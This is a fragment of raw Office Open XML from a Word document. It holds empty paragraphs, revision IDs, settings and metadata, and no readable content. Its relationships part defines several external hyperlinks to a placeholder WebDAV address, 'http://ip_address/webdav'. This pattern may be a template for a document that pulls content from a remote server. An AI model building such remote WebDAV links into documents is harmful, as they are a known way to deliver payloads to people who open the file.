    <w:p w14:paraId="193DE2FB" w14:textId="77777777" w:rsidR="00DA4F78" w:rsidRPr="00DA4F78" w:rsidRDefault="00DA4F78" w:rsidP="00DA4F78"/>
    <w:p w14:paraId="7EE516C7" w14:textId="77777777" w:rsidR="00DA4F78" w:rsidRDefault="00DA4F78"/>
    <w:p w14:paraId="1714FBE9" w14:textId="77777777" w:rsidR="00DA4F78" w:rsidRDefault="00DA4F78"/>
    <w:p w14:paraId="7A7EB58B" w14:textId="77777777" w:rsidR="00854EF6" w:rsidRDefault="00854EF6"/>
    <w:sectPr w:rsidR="00854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11"/>
    <w:rsid w:val="000E695F"/>
    <w:rsid w:val="003C5319"/>
    <w:rsid w:val="003E4062"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="00854EF6"/>
    <w:rsid w:val="009F13D5"/>
    <w:rsid w:val="00A16A11"/>
    <w:rsid w:val="00DA4F78"/>
    <w:rsid w:val="00F07686"/>
    <w:rsid w:val="00FD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55EE"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{45401627-65F5-45BF-8A47-C21A8CBC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p_address/webdav" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ip_address/webdav" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ip_address/web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9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-26T04:49:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-26T05:39:00Z</dcterms:modified>
</cp:coreProperties>
</file>